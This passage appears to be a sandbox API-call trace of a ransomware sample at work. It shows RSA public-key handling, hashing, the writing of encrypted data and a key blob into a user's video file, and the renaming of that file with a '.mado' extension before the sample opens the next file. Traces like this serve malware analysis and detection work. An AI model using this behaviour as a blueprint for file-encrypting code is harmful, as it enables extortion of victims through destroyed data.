KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.708] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.709] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.709] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.709] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.709] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.710] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.710] GetLastError () returned 0x0 [0205.710] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.710] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.710] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.710] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.710] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xdce0) returned 0x3b81690 [0205.710] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66780 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9d0 [0205.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b667c8 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9e8 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea30 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.711] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea30 | out: hHeap=0x2c0000) returned 1 [0205.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fea30 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fea18 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea30 | out: hHeap=0x2c0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.712] GetCurrentThreadId () returned 0x600 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69c08 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.712] GetCurrentThreadId () returned 0x600 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea30 [0205.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea00 [0205.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea90 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fa0 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea78 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea30 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea00 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9e8 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b667c8 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72e98 | out: hHeap=0x2c0000) returned 1 [0205.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.716] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0xdcde, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0xdcde, lpOverlapped=0x0) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.716] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xdce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.716] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.717] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.717] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.717] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.717] CloseHandle (hObject=0x63c) returned 1 [0205.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed98 | out: hHeap=0x2c0000) returned 1 [0205.718] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\jBglL OmaREsTS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\jbgll omarests.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\jBglL OmaREsTS.mp4.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\jbgll omarests.mp4.mado")) returned 1 [0205.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.719] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0205.720] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe029d7e0, ftCreationTime.dwHighDateTime=0x1d5db21, ftLastAccessTime.dwLowDateTime=0xc68c7e80, ftLastAccessTime.dwHighDateTime=0x1d5d7e0, ftLastWriteTime.dwLowDateTime=0xc68c7e80, ftLastWriteTime.dwHighDateTime=0x1d5d7e0, nFileSizeHigh=0x0, nFileSizeLow=0xbed2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s53y8a3aL.avi", cAlternateFileName="S53Y8A~1.AVI")) returned 1 [0205.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0205.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.720] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\s53y8a3aL.avi") returned=".avi" [0205.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\s53y8a3aL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\s53y8a3al.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.720] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=48850) returned 1 [0205.720] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.723] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xbeac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.723] ReadFile (in: hFile=0x63c, 